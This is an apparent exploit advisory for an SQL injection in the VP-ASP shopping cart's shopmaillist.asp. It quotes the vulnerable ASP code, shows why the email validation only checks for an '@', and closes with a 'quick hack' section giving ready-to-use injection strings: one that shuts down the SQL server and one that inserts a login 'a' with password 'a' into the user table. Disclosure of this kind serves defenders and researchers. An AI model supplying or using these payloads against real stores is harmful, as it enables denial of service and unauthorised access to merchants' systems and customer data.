************************************************** !!! WARNING !!! *********************************************************** * FOR EDUCATIONAL PURPOSES ONLY! * ****************************************************************************************************************************** * Neither myself nor any of my Affiliates shall be liable for any direct, incidental, consequential, indirect * * or punitive damages arising out of access to, inability to access, or any use of the content of this advisory, * * including without limitation any PC, other equipment or other property, even if I am Expressly advised of * * the possibility of such damages. I DO NOT encourage criminal activities. If you use this advisory or commit * * criminal acts with it, then you are solely responsible for your own actions and by use, downloading,transferring, * * and/or reading anything from this advisory you are considered to have accepted the terms and conditions and have read * * this disclaimer. Once again this advisory is for educational purposes only. * ****************************************************************************************************************************** * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * VP-ASP x.x.x shopmaillist.asp SQL Injection (TESTED ON 5.xx/6.00>?) discovered by tracewar(tracewar@gmail.com). the SQL injection exists in the UpdateCustomer procedure: Sub UpdateCustomer if getconfig("xMYSQL")="Yes" then MYSQLMaillistUpdateCustomer exit sub end if dim dbc, whereok dim doupdate, templastname OpenCustomerDb dbc Set objRS = Server.CreateObject("ADODB.Recordset") templastname=replace(strlastname,"'","''") SQL = "SELECT * FROM " & dbtable & " WHERE " whereok="" sql=sql & whereok & " LastName='" & TempLastName & "'" whereok = " AND " SQL = SQL & whereok & " email='" & stremail & "'" objRS.open SQL, dbc, adOpenKeyset, adLockOptimistic, adcmdText 'debugwrite sql if not ObjRS.eof then DoUpdate="True" else objRs.close set objRS=nothing end if If Doupdate="" then Set objRS = Server.CreateObject("ADODB.Recordset") objRS.open dbtable, dbc, adOpenKeyset, adLockOptimistic, adCmdTable objRS.AddNew end if Updateminimuminfo objrs CloseRecordset objRS ShopCloseDatabase dbc end sub If you keep tracking the code you will notice the "stremail" query isn't checked properly for SQL injections: Else ValidateData() if sError = "" Then If unsubscribe="" then UpdateCustomer SendMailToMerchant LangMailListRegistration WriteInfo the ValidateData() procedure is totally useless: Sub ValidateData strFirstname = Request.Form("strFirstname") strLastname = Request.Form("strLastname") strEmail = Request.Form("strEmail") unsubscribe=request("blnmaillist") ValidateMininumInfo End Sub Sub ValidateMininumInfo BlnMailList=TRUE If strLastname = "" Then sError = sError & LangCustLastname & LangCustRequired & "
" End If If strEmail = "" Then sError = sError & LangCustEmail & LangCustRequired & "
" Else CustomerValidateEmail stremail end If end sub Sub CustomerValidateEmail (stremail) If Not InStr(strEmail, "@") > 1 Then Serror=Serror & LangInvalidEmail & "
" end if End sub the query must contain @ as a first character in order to pass the CustomerValidateEmail useless procedure. oh and this is also the reason why sql injection scanners didn't detect this injection earlier(HMPF HMPF *TIP* :P) quick hack: write this as email: JUNK@';shutdown-- in order to shutdown the sql server. write this as email: asdsadd@asdd.com';insert into tbluser ('fldusername','fldpassword','fldaccess') values ('a','a')-- in order to add user 'a' with password 'a'. THE END. * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE *